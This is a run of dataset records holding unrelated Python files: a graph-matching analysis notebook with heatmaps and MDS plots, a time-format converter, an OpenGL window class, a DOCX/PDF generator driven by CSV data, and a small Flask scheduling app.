**heatmap_kws)\n\nplt.yticks(rotation=0)\n# %% [markdown]\n# ##\nfig, axs = plt.subplots(1, 3, figsize=(24, 8), sharey=True)\nax = axs[0]\nunnorm_df = res_df[res_df[\"norm\"] == False]\ncorr_df = unnorm_df.pivot(index=\"alpha\", columns=\"beta\", values=\"corr\")\nsns.heatmap(data=corr_df, ax=ax, **heatmap_kws)\nax.set_title(\"Norm = False\")\nax = axs[1]\nfro_df = res_df[res_df[\"norm\"] == \"fro\"]\ncorr_df = fro_df.pivot(index=\"alpha\", columns=\"beta\", values=\"corr\")\nsns.heatmap(data=corr_df, ax=ax, **heatmap_kws)\nax.set_title(\"Norm = fro\")\nax = axs[2]\nsum_df = res_df[res_df[\"norm\"] == \"sum\"]\ncorr_df = sum_df.pivot(index=\"alpha\", columns=\"beta\", values=\"corr\")\nsns.heatmap(data=corr_df, ax=ax, **heatmap_kws)\nax.set_title(\"Norm = sum\")\nplt.yticks(rotation=0)\nstashfig(\"corr-heatmaps\" + basename)\n\nfig, axs = plt.subplots(1, 3, figsize=(24, 8), sharey=True)\nax = axs[0]\nunnorm_df = res_df[res_df[\"norm\"] == False]\ncorr_df = unnorm_df.pivot(index=\"alpha\", columns=\"beta\", values=\"score\")\nsns.heatmap(data=corr_df, ax=ax, **heatmap_kws)\nax.set_title(\"Norm = False\")\nax = axs[1]\nfro_df = res_df[res_df[\"norm\"] == \"fro\"]\ncorr_df = fro_df.pivot(index=\"alpha\", columns=\"beta\", values=\"score\")\nsns.heatmap(data=corr_df, ax=ax, **heatmap_kws)\nax.set_title(\"Norm = fro\")\nax = axs[2]\nsum_df = res_df[res_df[\"norm\"] == \"sum\"]\ncorr_df = sum_df.pivot(index=\"alpha\", columns=\"beta\", values=\"score\")\nsns.heatmap(data=corr_df, ax=ax, **heatmap_kws)\nax.set_title(\"Norm = sum\")\nplt.yticks(rotation=0)\nstashfig(\"score-heatmaps\" + basename)\n\n\n# %% [markdown]\n# ##\n# indicator = 
np.full(len(gm.positions_), i)\n# all_positions += gm.positions_\n# init_indicator.append(indicator)\n\ninit_indicator.append([\"Barycenter\"])\ninit_indicator.append([\"Truth\"])\ninit_indicator = np.concatenate(init_indicator)\n# init_indicator = np.array(init_indicator)\nall_positions.append(np.full(A1.shape, 1 / A1.size))\nall_positions.append(P.T)\nall_positions = np.array(all_positions)\nall_positions = all_positions.reshape((len(all_positions), -1))\n\n\nposition_pdist = pairwise_distances(all_positions, metric=\"euclidean\")\n\n\ncmds = ClassicalMDS(n_components=2, dissimilarity=\"euclidean\")\nall_X = cmds.fit_transform(all_positions)\nall_X -= all_X[-1]\n\n# remove_rand = False\n# if remove_rand:\n# X = all_X[n_rand:]\n# init_indicator = init_indicator[n_rand:]\n# else:\nX = all_X\n\n\nplot_df = pd.DataFrame(data=X)\nplot_df[\"init\"] = init_indicator\nsns.set_context(\"talk\")\nfig, ax = plt.subplots(1, 1, figsize=(10, 10))\n# sns.scatterplot(data=plot_df[plot_df[\"init\"] == \"Random\"], x=0, y=1, ax=ax)\nsns.lineplot(\n data=plot_df[~plot_df[\"init\"].isin([\"Barycenter\", \"Truth\", \"Random\"])],\n x=0,\n y=1,\n hue=\"init\",\n palette=sns.color_palette(\"husl\", n_init),\n ax=ax,\n legend=False,\n # markers=True,\n # style=\"init\",\n)\nsns.scatterplot(\n data=plot_df[plot_df[\"init\"] == \"Barycenter\"],\n x=0,\n y=1,\n ax=ax,\n s=200,\n marker=\"s\",\n color=\"slategrey\",\n)\nsns.scatterplot(\n data=plot_df[plot_df[\"init\"] == \"Truth\"],\n x=0,\n y=1,\n ax=ax,\n s=400,\n marker=\"*\",\n color=\"green\",\n alpha=0.8,\n)\ncollections = ax.collections\ncollections[-1].set_zorder(n_init + 100)\ncollections[-2].set_zorder(n_init + 200)\nax.axis(\"off\")\n\n# %%\nn_rand = 100\npermutations = [random_permutation(n_verts) for _ in range(n_rand)]\nrandom_stochastics = [random_permutation(n_verts) for _ in range(n_rand)]\nbarycenter = np.full(A1.shape, 1 / A1.size)\nall_positions = []\nall_positions += permutations\nall_positions += random_stochastics\nall_positions += [barycenter]\nlabels = n_rand * [\"Permutation\"] + n_rand * [\"Doubly stochastic\"] + [\"Barycenter\"]\n\nall_positions = np.array(all_positions)\n\nall_positions = all_positions.reshape((len(all_positions), -1))\n\ncmds = ClassicalMDS(n_components=2, dissimilarity=\"euclidean\")\nX = cmds.fit_transform(all_positions)\n\nplot_df = pd.DataFrame(data=X)\nplot_df[\"label\"] = labels\nsns.set_context(\"talk\")\nfig, ax = plt.subplots(1, 1, figsize=(10, 10))\nsns.scatterplot(data=plot_df, x=0, y=1, ax=ax, hue=\"label\")\n\n\n# %% [markdown]\n# ##\n\n\n# # %% [markdown]\n# # ## Create the matching matrix\n\n\n# def diag_indices(length, k=0):\n# return (np.arange(length - k), np.arange(k, length))\n\n\n# def make_flat_match(length, **kws):\n# match_mat = np.zeros((length, length))\n# match_mat[np.triu_indices(length, k=1)] = 1\n# return match_mat\n\n\n# def make_linear_match(length, offset=0, **kws):\n# match_mat = np.zeros((length, length))\n# for k in np.arange(1, length):\n# match_mat[diag_indices(length, k)] = length - k + offset\n# return match_mat\n\n\n# def normalize_match(graph, match_mat):\n# return match_mat / match_mat.sum() * graph.sum()\n\n\n# # %% [markdown]\n# # ##\n\n# methods = [make_flat_match, make_linear_match, make_exp_match]\n# names = [\"Flat\", \"Linear\", \"Exp\"]\n\n# gm = GraphMatch(\n# n_init=25, init_method=\"rand\", max_iter=80, eps=0.05, shuffle_input=True\n# )\n# alpha = 0.005\n# match_mats = []\n# permutations = []\n# for method, name in zip(methods, names):\n# print(name)\n# match_mat = 
method(len(adj), alpha=alpha)\n# match_mat = normalize_match(adj, match_mat)\n# match_mats.append(match_mat)\n# gm.fit(match_mat, adj)\n# permutations.append(gm.perm_inds_)\n\n# # %% [markdown]\n# # ##\n# from src.hierarchy import signal_flow\n# from src.visualization import remove_axis\n# import pandas as pd\n\n# n_verts = len(adj)\n# sf = signal_flow(adj)\n# sf_perm = np.argsort(-sf)\n# inds = np.arange(n_verts)\n\n# plot_df = pd.DataFrame()\n# plot_df[\"labels\"] = labels\n# plot_df[\"x\"] = inds\n\n\n# def format_order_ax(ax):\n# ax.set_xticks([])\n# ax.set_yticks([])\n# ax.set_ylabel(\"\")\n# ax.set_xlabel(\"True order\")\n# ax.axis(\"square\")\n\n\n# if n_blocks > 10:\n# pal = \"tab20\"\n# else:\n# pal = \"tab10\"\n# color_dict = dict(zip(np.unique(labels), sns.color_palette(pal, n_colors=n_blocks)))\n\n\n# def plot_diag_boxes(ax):\n# for i in range(n_blocks):\n# low = i * n_per_block - 0.5\n# high = (i + 1) * n_per_block + 0.5\n# xs = [low, high, high, low, low]\n# ys = [low, low, high, high, low]\n# ax.plot(xs, ys, color=color_dict[i], linestyle=\"--\", linewidth=0.7, alpha=0.7)\n\n\n# def calc_accuracy(block_preds):\n# acc = (block_preds == labels).astype(float).mean()\n# return acc\n\n\n# def calc_abs_dist(block_preds):\n# mae = np.abs(block_preds - labels).mean()\n# return mae\n\n\n# def calc_euc_dist(block_preds):\n# sse = np.sqrt(((block_preds - labels) ** 2).sum())\n# mse = sse / len(block_preds)\n# return mse\n\n\n# def plot_scores(perm, ax):\n# block_preds = perm // n_per_block\n# acc = calc_accuracy(block_preds)\n# mae = calc_abs_dist(block_preds)\n# mse = calc_euc_dist(block_preds)\n# ax.text(\n# 0.75,\n# 0.07,\n# f\"Acc. {acc:.2f}\\nMAE {mae:.2f}\\nMSE {mse:.2f}\",\n# transform=ax.transAxes,\n# )\n\n\n# # model\n# fig, axs = plt.subplots(3, 6, figsize=(30, 15))\n\n# scatter_kws = dict(\n# x=\"x\",\n# y=\"y\",\n# hue=\"labels\",\n# s=7,\n# linewidth=0,\n# palette=color_dict,\n# legend=False,\n# alpha=1,\n# )\n# first = 0\n# ax = axs[0, first]\n# ax.set_title(\"Model (truth)\")\n# sns.heatmap(block_probs, annot=True, cmap=\"Reds\", cbar=False, ax=ax, square=True)\n# show_annot_array = np.zeros_like(block_probs, dtype=bool)\n# show_annot_array[0, :3] = 1\n# for text, show_annot in zip(\n# ax.texts, (element for row in show_annot_array for element in row)\n# ):\n# text.set_visible(show_annot)\n# ax.set_xticks([])\n# ax.set_yticks([])\n\n# adjplot(adj, colors=labels, ax=axs[1, first], cbar=False)\n# plot_df[\"y\"] = inds\n# ax = axs[2, first]\n# sns.scatterplot(data=plot_df, ax=ax, **scatter_kws)\n# format_order_ax(ax)\n# ax.set_ylabel(\"Predicted order\")\n# plot_diag_boxes(ax)\n# plot_scores(inds, ax)\n\n# # random\n# first = 1\n# remove_axis(axs[0, first])\n# axs[0, first].set_title(\"Random\")\n# perm = inds.copy()\n# np.random.shuffle(perm)\n# adjplot(adj[np.ix_(perm, perm)], colors=labels[perm], ax=axs[1, first], cbar=False)\n# plot_df[\"y\"] = perm\n# ax = axs[2, first]\n# sns.scatterplot(data=plot_df, ax=ax, **scatter_kws)\n# format_order_ax(ax)\n# plot_diag_boxes(ax)\n# plot_scores(perm, ax)\n\n# # signal flow\n# first = 2\n# remove_axis(axs[0, first])\n# axs[0, first].set_title(\"Signal flow\")\n# adjplot(\n# adj[np.ix_(sf_perm, sf_perm)], colors=labels[sf_perm], ax=axs[1, first], cbar=False\n# )\n# plot_df[\"y\"] = sf_perm\n# ax = axs[2, first]\n# sns.scatterplot(data=plot_df, ax=ax, **scatter_kws)\n# format_order_ax(ax)\n# plot_diag_boxes(ax)\n# plot_scores(sf_perm, ax)\n\n\n# # graph matching\n# first = 3\n# for i, (match, perm) in enumerate(zip(match_mats, 
permutations)):\n# axs[0, i + first].set_title(names[i])\n# # matching matrix\n# adjplot(match, ax=axs[0, i + first], cbar=False)\n# # adjacency\n# adjplot(\n# adj[np.ix_(perm, perm)], colors=labels[perm], ax=axs[1, i + first], cbar=False\n# )\n# # ranks\n# plot_df[\"y\"] = perm\n# ax = axs[2, i + first]\n# sns.scatterplot(data=plot_df, ax=ax, **scatter_kws)\n# format_order_ax(ax)\n# plot_diag_boxes(ax)\n# plot_scores(perm, ax)\n\n\n# plt.tight_layout()\n# stashfig(\"sbm-ordering\" + basename)\n\n\n# # axs[0, first].set_title(\"Signal flow\")\n# # axs[0, first].set_ylabel(\"Match matrix\")\n# # axs[1, first].set_ylabel(\"Sorted adjacency\")\n\n\n# #%%\n\n\n# # perm = fit_gm_exp(adj, 0.005, n_init=10)\n# # perm_adj = adj[np.ix_(perm, perm)]\n\n# # ps = calc_p_by_k(ks, perm_adj)\n# # exps = exp_func(ks, alpha)\n\n\n# from scipy.optimize import curve_fit\n\n\n# # param_guess, _ = curve_fit(exp_func, ks, ps, p0=(alpha, 1))\n# # alpha_guess = param_guess[0]\n# # beta_guess = param_guess[1]\n# # plt.figure()\n# # sns.lineplot(x=ks, y=ps)\n# # sns.lineplot(x=ks, y=exps)\n# # sns.lineplot(x=ks, y=exp_func(ks, alpha_guess, beta_guess))\n\n# # %% [markdown]\n# # ##\n\n# length = len(adj)\n\n# ks = np.arange(1, length)\n\n\n# def exp_func(k, alpha, beta=1, c=0):\n# return beta * np.exp(-alpha * (k - 1)) + c\n\n\n# def make_exp_match(length, alpha=0.5, beta=1, c=0, **kws):\n# match_mat = np.zeros((length, length))\n# for k in np.arange(1, length):\n# match_mat[diag_indices(length, k)] = exp_func(k, alpha, beta, c)\n# return match_mat\n\n\n# def fit_gm_exp(adj, alpha, beta=1, c=0, n_init=5, norm=False):\n# gm = GraphMatch(\n# n_init=n_init, init_method=\"rand\", max_iter=80, eps=0.05, shuffle_input=True\n# )\n# length = len(adj)\n# match_mat = make_exp_match(length, alpha=alpha)\n# if norm:\n# match_mat = normalize_match(adj, match_mat)\n# match_mats.append(match_mat)\n# gm.fit(match_mat, adj)\n# return gm.perm_inds_\n\n\n# def calc_p_by_k(ks, perm_adj):\n# length = len(perm_adj)\n# ps = []\n# for k in ks:\n# p = perm_adj[diag_indices(length, k)].mean()\n# ps.append(p)\n# return np.array(ps)\n\n\n# def get_vals_by_k(ks, perm_adj):\n# ys = []\n# xs = []\n# for k in ks:\n# y = perm_adj[diag_indices(len(perm_adj), k)]\n# ys.append(y)\n# x = np.full(len(y), k)\n# xs.append(x)\n# return np.concatenate(ys), np.concatenate(xs)\n\n\n# #%%\n# alpha_guess = 0.005\n# beta_guess = 1\n# c_guess = np.mean(adj)\n# opt_beta = True\n# opt_c = True\n# n_iter = 3\n# for i in range(n_iter):\n# print(i)\n# perm = fit_gm_exp(adj, alpha_guess, beta_guess, c_guess, n_init=10)\n# perm_adj = adj[np.ix_(perm, perm)]\n# ys, xs = get_vals_by_k(ks, perm_adj)\n# ps = calc_p_by_k(ks, perm_adj)\n# exps = exp_func(ks, alpha_guess, beta_guess)\n# if opt_beta:\n# param_guess, _ = curve_fit(\n# exp_func, xs, ys, p0=(alpha_guess, beta_guess, c_guess)\n# )\n# beta_guess = 1 # param_guess[1]\n# c_guess = param_guess[2]\n# else:\n# param_guess, _ = curve_fit(exp_func, ks, ps, p0=(alpha))\n# alpha_guess = param_guess[0]\n\n# plt.figure()\n# sns.lineplot(x=ks, y=ps)\n# sns.lineplot(x=ks, y=exps)\n# sns.lineplot(x=ks, y=exp_func(ks, alpha_guess, beta_guess, c_guess))\n# adjplot(adj[np.ix_(perm, perm)], colors=labels[perm], cbar=False)\n# plt.show()\n\n# # %% [markdown]\n# # ##\n# ps = calc_p_by_k(ks, adj)\n# ys, xs = get_vals_by_k(ks, adj)\n# param_guess, _ = curve_fit(exp_func, xs, ys, p0=(0.05, 0.5, np.mean(adj)))\n# exps = exp_func(ks, *param_guess)\n# plt.figure()\n# sns.lineplot(x=ks, y=ps)\n# sns.lineplot(x=ks, y=exps)\n# perm = 
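# Self-contained sketch of the exponential match-matrix construction above:
# the k-th superdiagonal gets weight beta * exp(-alpha * (k - 1)) + c, so the
# target mass decays with distance from the main diagonal (numpy only).
import numpy as np

def diag_indices(length, k=0):
    return (np.arange(length - k), np.arange(k, length))

def make_exp_match(length, alpha=0.5, beta=1.0, c=0.0):
    match_mat = np.zeros((length, length))
    for k in np.arange(1, length):
        match_mat[diag_indices(length, k)] = beta * np.exp(-alpha * (k - 1)) + c
    return match_mat

print(np.round(make_exp_match(5, alpha=0.5), 2))  # upper-triangular, decaying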
fit_gm_exp(adj, param_guess[0], param_guess[1], param_guess[2], n_init=10)\n# adjplot(adj[np.ix_(perm, perm)], colors=labels[perm], cbar=False)\n\n# # %% [markdown]\n# # ##\n\n\n# permutations = []\n# alphas = [0.001, 0.005, 0.01, 0.05]\n# for alpha in alphas:\n# perm = fit_gm_exp(adj, alpha, n_init=5)\n# permutations.append(perm)\n# _, _, top, _ = adjplot(adj[np.ix_(perm, perm)], colors=labels[perm], cbar=False)\n# top.set_title(alpha)\n\n# # %% [markdown]\n# # ##\n# fig, axs = plt.subplots(3, 4, figsize=(20, 15))\n\n# for i, (match, perm) in enumerate(zip(match_mats, permutations)):\n# perm_adj = adj[np.ix_(perm, perm)]\n# alpha = alphas[i]\n\n# exp = exp_func(ks, alpha=alpha)\n\n# ax = axs[0, i]\n# ax.set_title(alpha)\n\n# sns.lineplot(x=ks, y=calc_p_by_k(ks, perm_adj), ax=ax)\n# sns.lineplot(x=ks, y=exp, ax=ax)\n\n# # matching matrix\n# # adjplot(match, ax=axs[0, i], cbar=False)\n# # adjacency\n# _, _, top, _ = adjplot(perm_adj, colors=labels[perm], ax=axs[1, i], cbar=False)\n# # top.set_title(alpha)\n# # ranks\n# plot_df[\"y\"] = perm\n# ax = axs[2, i]\n# sns.scatterplot(data=plot_df, ax=ax, **scatter_kws)\n# format_order_ax(ax)\n# plot_diag_boxes(ax)\n# plot_scores(perm, ax)\n# if i == 0:\n# ax.set_ylabel(\"Predicted order\")\n\n# stashfig(\"alpha-matters\" + basename)\n\n\n# # %% [markdown]\n# # ## Oracles\n# # permutations = []\n# # alphas = [0.001, 0.005, 0.01, 0.05]\n# # for alpha in alphas:\n# # perm = fit_gm_exp(adj, alpha, n_init=5)\n# # permutations.append(perm)\n# # _, _, top, _ = adjplot(adj[np.ix_(perm, perm)], colors=labels[perm], cbar=False)\n# # top.set_title(alpha)\n\n# ys, xs = get_vals_by_k(ks, adj)\n\n# inits = [(0.05), (0.05, 1), (0.05, 1, np.mean(adj))]\n# names = [r\"$y = exp(-ak)$\", r\"$y = b \\cdot exp(-ak)$\", r\"$y = b \\cdot exp(-ak) + c$\"]\n# permutations = []\n# params = []\n# for init_params, name in zip(inits, names):\n# # just decay\n# param_guess, _ = curve_fit(exp_func, xs, ys, p0=init_params)\n# params.append(param_guess)\n# exps = exp_func(ks, *param_guess)\n# perm = fit_gm_exp(adj, *param_guess, n_init=5)\n# permutations.append(perm)\n\n# # %% [markdown]\n# # ##\n# fig, axs = plt.subplots(3, 3, figsize=(15, 15))\n\n# for i, (name, perm) in enumerate(zip(names, permutations)):\n# perm_adj = adj[np.ix_(perm, perm)]\n# p = params[i]\n\n# exp = exp_func(ks, *p)\n\n# ax = axs[0, i]\n# ax.set_title(name)\n\n# sns.lineplot(x=ks, y=calc_p_by_k(ks, perm_adj), ax=ax, label=r\"$\\hat{P}$\")\n# sns.lineplot(x=ks, y=exp, ax=ax, label=r\"Match matrix\")\n# if i > 0:\n# ax.get_legend().remove()\n# ax.set_xlabel(\"k\")\n# ax.set_xticks([])\n\n# # matching matrix\n# # adjplot(match, ax=axs[0, i], cbar=False)\n# # adjacency\n# _, _, top, _ = adjplot(perm_adj, colors=labels[perm], ax=axs[1, i], cbar=False)\n# # top.set_title(alpha)\n# # ranks\n# plot_df[\"y\"] = perm\n# ax = axs[2, i]\n# sns.scatterplot(data=plot_df, ax=ax, **scatter_kws)\n# format_order_ax(ax)\n# plot_diag_boxes(ax)\n# plot_scores(perm, ax)\n\n# axs[-1, 0].set_ylabel(\"Predicted order\")\n# axs[0, 0].set_ylabel(\"y\")\n# fig.suptitle(\"Oracle parameter estimates (a, b, c)\", y=0.95)\n# stashfig(\"oracle-fits\" + basename)\n\n# # %% [markdown]\n# # ## EM way\n\n# n_init = 5\n# alpha_guess = 0.001\n# beta_guess = 1\n# c_guess = np.mean(adj)\n# param_guess = np.array([alpha_guess, beta_guess, c_guess])\n# n_iter = 4\n# parameters = [param_guess]\n# permutations = []\n# for i in range(n_iter):\n# perm = fit_gm_exp(adj, *param_guess, n_init=n_init)\n# perm_adj = adj[np.ix_(perm, perm)]\n# ys, xs = 
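# Minimal sketch of the curve_fit step used in the loops above: recover
# (alpha, beta, c) of an exponential decay from noisy samples. curve_fit
# infers the number of free parameters from len(p0), which is why passing a
# 3-tuple fits all three even though beta and c have defaults.
import numpy as np
from scipy.optimize import curve_fit

def exp_func(k, alpha, beta=1.0, c=0.0):
    return beta * np.exp(-alpha * (k - 1)) + c

ks = np.arange(1, 100)
rng = np.random.default_rng(0)
ps = exp_func(ks, 0.05, 0.8, 0.1) + rng.normal(0, 0.01, size=ks.shape)

param_guess, _ = curve_fit(exp_func, ks, ps, p0=(0.01, 1.0, 0.0))
print(np.round(param_guess, 3))  # close to the true (0.05, 0.8, 0.1)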
get_vals_by_k(ks, perm_adj)\n# ps = calc_p_by_k(ks, perm_adj)\n# param_guess, _ = curve_fit(exp_func, xs, ys, p0=param_guess)\n# parameters.append(param_guess)\n# permutations.append(perm)\n\n# #%%\n# fig, axs = plt.subplots(3, n_iter, figsize=(5 * n_iter, 15))\n\n# for i, (params, perm) in enumerate(zip(parameters, permutations)):\n# perm_adj = adj[np.ix_(perm, perm)]\n\n# exp = exp_func(ks, *params)\n\n# ax = axs[0, i]\n# ax.set_title(f\"Iteration {i}\")\n\n# sns.lineplot(x=ks, y=calc_p_by_k(ks, perm_adj), ax=ax, label=r\"$\\hat{P}$\")\n# sns.lineplot(x=ks, y=exp, ax=ax, label=r\"Match matrix\")\n# if i > 0:\n# ax.get_legend().remove()\n# ax.set_xlabel(\"k\")\n# ax.set_xticks([])\n\n# # matching matrix\n# # adjplot(match, ax=axs[0, i], cbar=False)\n# # adjacency\n# _, _, top, _ = adjplot(perm_adj, colors=labels[perm], ax=axs[1, i], cbar=False)\n# # top.set_title(alpha)\n# # ranks\n# plot_df[\"y\"] = perm\n# ax = axs[2, i]\n# sns.scatterplot(data=plot_df, ax=ax, **scatter_kws)\n# format_order_ax(ax)\n# plot_diag_boxes(ax)\n# plot_scores(perm, ax)\n\n# axs[-1, 0].set_ylabel(\"Predicted order\")\n# axs[0, 0].set_ylabel(\"y\")\n# # fig.suptitle(\"Oracle parameter estimates (a, b, c)\", y=0.95)\n# stashfig(\"em-fits\" + basename)\n\n\n# # %%\n","repo_name":"neurodata/maggot_models","sub_path":"notebooks/167.0-BDP-gm-flow-sim.py","file_name":"167.0-BDP-gm-flow-sim.py","file_ext":"py","file_size_in_byte":25795,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"42200729346","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 16 13:55:19 2019\n\n@author: jyothyrajs\n\"\"\"\nimport os\nimport sys\ndef timeConversion(s):\n hr,minute,sec = s.split(':')\n nhr=hr\n if(sec[2:4] == 'PM' and int(hr)<12 ):\n nhr= int(hr)+12\n \n if(sec[2:4] == 'AM' and int(hr)==12):\n nhr = 00\n sec = sec.rstrip(\".APM\")\n s1 = \"{}:{}:{}\"\n s2 = \"0{}:{}:{}\" \n if(int(nhr)==0):\n return s2.format(nhr,minute,sec)\n return s1.format(nhr,minute,sec)\nif __name__ == '__main__':\n # f = open(os.environ['OUTPUT_PATH'], 'w')\n\n s = input()\n\n result = timeConversion(s)\n print(result)\n\n # f.write(result + '\\n')\n\n # f.close()\n","repo_name":"Jyothyrajs/Python","sub_path":"timeconversion.py","file_name":"timeconversion.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"850603529","text":"from OpenGL.GL import *\nfrom OpenGL.GLUT import *\nimport sys\nfrom Canvas import Canvas\n\n# if MOVEMENT_MODE is 0, a figure can move in all directions\n# else figure can move only along vector (-1, 0)\nMOVEMENT_MODE = 0\n\n\nclass Window:\n\n def __init__(self, width, height, window_name, coeff=10, grid_coeff=30):\n self.width = width\n self.height = height\n self.window_name = window_name\n self.canvas = Canvas(width, height, coeff, grid_coeff)\n\n def apply_settings(self):\n # bg color, viewport settings and (0, 0) position\n glViewport(0, 0, self.width, self.height)\n glClearColor(0, 0.5, 0.5, 1)\n glLoadIdentity()\n glMatrixMode(GL_PROJECTION)\n glOrtho(0, self.width, 0, self.height, 1.0, -1.0)\n\n def show(self, pos_x=0, pos_y=0):\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_RGBA)\n glutInitWindowSize(self.width, self.height)\n glutInitWindowPosition(pos_x, pos_y)\n glutCreateWindow(self.window_name)\n # bg color, viewport settings and (0, 0) position\n self.apply_settings()\n # set callback functions\n 
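# Aside on the hand-rolled 12-hour -> 24-hour conversion above:
# datetime.strptime gives the same result with far fewer edge cases; a
# stdlib-only sketch.
from datetime import datetime

def time_conversion(s):
    # "07:05:45PM" -> "19:05:45"
    return datetime.strptime(s, "%I:%M:%S%p").strftime("%H:%M:%S")

assert time_conversion("07:05:45PM") == "19:05:45"
assert time_conversion("12:00:00AM") == "00:00:00"
assert time_conversion("12:00:00PM") == "12:00:00"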
glutDisplayFunc(self.canvas.display_figure)\n glutReshapeFunc(self.reshape)\n glutKeyboardFunc(self.keyboard)\n glutMouseFunc(self.mouse_func)\n glutMotionFunc(self.motion_func)\n glutMouseWheelFunc(self.wheel_func)\n glutMainLoop()\n\n def set_figure_pos(self, x, y):\n # placing a figure in the beginning of execution\n self.canvas.fpos_x = x\n self.canvas.fpos_y = y\n\n def reshape(self, w, h):\n # compute a new figure position in reshaped window\n self.canvas.fpos_x *= w / self.canvas.width\n self.canvas.fpos_y *= h / self.canvas.height\n # new width and height of reshaped window\n self.width = self.canvas.width = w\n self.height = self.canvas.height = h\n # viewport settings and (0, 0) position\n self.apply_settings()\n # apply changes\n self.canvas.update()\n\n def keyboard(self, key, x, y):\n pressed_key = key.decode(\"utf-8\").lower()\n if pressed_key == chr(27):\n sys.exit(0)\n if pressed_key == ' ':\n self.canvas.fpos_x = self.width / 2\n self.canvas.fpos_y = self.height / 2\n if MOVEMENT_MODE:\n if pressed_key == 'w' or pressed_key == 's':\n if 0 < self.canvas.fpos_x:\n self.canvas.fpos_x -= self.canvas.grid_coeff\n elif pressed_key == 'a' or pressed_key == 'd':\n if self.canvas.fpos_x < self.width:\n self.canvas.fpos_x += self.canvas.grid_coeff\n else:\n if pressed_key == 'w':\n if self.canvas.fpos_y + self.canvas.grid_coeff < self.height:\n self.canvas.fpos_y += self.canvas.grid_coeff\n elif pressed_key == 's':\n if self.canvas.fpos_y - self.canvas.grid_coeff > 0:\n self.canvas.fpos_y -= self.canvas.grid_coeff\n elif pressed_key == 'd':\n if self.canvas.fpos_x + self.canvas.grid_coeff < self.width:\n self.canvas.fpos_x += self.canvas.grid_coeff\n elif pressed_key == 'a':\n if self.canvas.fpos_x - self.canvas.grid_coeff > 0:\n self.canvas.fpos_x -= self.canvas.grid_coeff\n self.canvas.update()\n glutPostRedisplay()\n\n def mouse_func(self, button, state, x, y):\n # remember coordinates when mouse button was pressed\n self.canvas.pressed_x = x\n self.canvas.pressed_y = y\n\n def motion_func(self, x, y):\n # compute the distance the pointer has gone\n dx = x - self.canvas.pressed_x\n dy = y - self.canvas.pressed_y\n # move figure coordinates\n if 0 < self.canvas.fpos_x + dx < self.canvas.width:\n self.canvas.fpos_x += dx\n if 0 < self.canvas.fpos_y - dy < self.canvas.height:\n self.canvas.fpos_y -= dy\n # remember coordinates when pointer is moving\n self.canvas.pressed_x = x\n self.canvas.pressed_y = y\n # apply changes\n self.canvas.update()\n # call display function\n glutPostRedisplay()\n\n def wheel_func(self, wheel, direction, x, y):\n # if mouse wheel is moving forward zoom in\n if direction > 0 and self.canvas.coeff < 60:\n self.canvas.coeff += 5\n # if mouse wheel is moving backward zoom out\n elif direction < 0 and self.canvas.coeff > 5:\n self.canvas.coeff -= 5\n # apply changes\n self.canvas.update()\n # call display function\n glutPostRedisplay()\n","repo_name":"sergey-judi/opengl-python","sub_path":"Lab1/Window.py","file_name":"Window.py","file_ext":"py","file_size_in_byte":4683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20925212734","text":"import enum\nfrom docxtpl import DocxTemplate\nfrom docx2pdf import convert\nimport pandas as pd\ndf_test=pd.read_csv(\"data test.csv\",sep=\";\")\ndoc=DocxTemplate(\"PlantillaRHE.docx\")\nprint(df_test)\ndata_test=df_test.to_dict()\nfor idx,emi in enumerate(data_test['RUC EMISOR']):\n context={\n \"rucProvider\":data_test['RUC EMISOR'][idx],\n 
\"rucClient\":data_test['RUC RECEPTOR'][idx],\n \"nameProvider\":data_test['NOMBRE EMISOR'][idx],\n \"nameClient\":data_test['NOMBRE RECEPTOR'][idx],\n \"amountBrut\":'{:.2f}'.format(data_test['PRECIO'][idx]),\n \"amountNet\":'{:.2f}'.format(data_test['PRECIO'][idx]),\n \"serialNumber\":data_test['SERIE'][idx],\n \"id\":'{:02.0f}'.format(data_test['NUMERO DOCUMENTO'][idx])\n }\n file_name=f\"{data_test['RUC EMISOR'][idx]}_{'{:02.0f}'.format(data_test['TIPO DOCUMENTO'][idx])}_{data_test['SERIE'][idx]}_{data_test['NUMERO DOCUMENTO'][idx]}\"\n print(file_name)\n doc.render(context)\n doc.save(f\"{file_name}.docx\")\n pdfpath = file_name+'.pdf'\n xmlpath = file_name+'.xml'\n convert(f\"{file_name}.docx\", pdfpath)\n #convert(f\"{file_name}.docx\", xmlpath)\nprint(\"listos\")\n","repo_name":"danielichis/pdf_xmls_validators","sub_path":"files_generator.py","file_name":"files_generator.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12117802991","text":"# importing necessary modules & functions from workload.py\nimport collections\nimport numpy as np\nimport sys\nfrom flask import Flask\nfrom flask import render_template, request\n\nsys.path.append(\"/Users/2020abardhan/Desktop/workload/flaskproject-master/app/\")\nimport workload\nfrom workload import Order, Item, pretty_print_w, assign_time, order_orders, output_table\n\n# inits flask app w debugger on\napp = Flask(__name__)\napp.debug = True\n\n@app.route('/')\n@app.route('/base', methods=['GET'])\ndef index():\n out = ['', '', '', '', '']\n return render_template('base.html', out=out)\n\n@app.route('/order', methods=['POST'])\ndef order_now():\n order1 = Order()\n item1_1 = Item()\n order1.id = request.form['order_id']\n item1_1.type = request.form['order_item']\n #day = request.form['day']\n order1.items = [item1_1]\n\n orders = [order1]\n #get orders in order of their importance\n ordered_orders = order_orders(orders)\n #assign the orders to each day of the work week\n work_week = assign_time(ordered_orders, 100)\n #print out new schedule\n out = output_table(work_week)\n\n return render_template('base.html', out=out)\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"anish-bardhan/compsci_IA","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18602061480","text":"from django.conf.urls import url\nfrom django.contrib import admin\nfrom . 
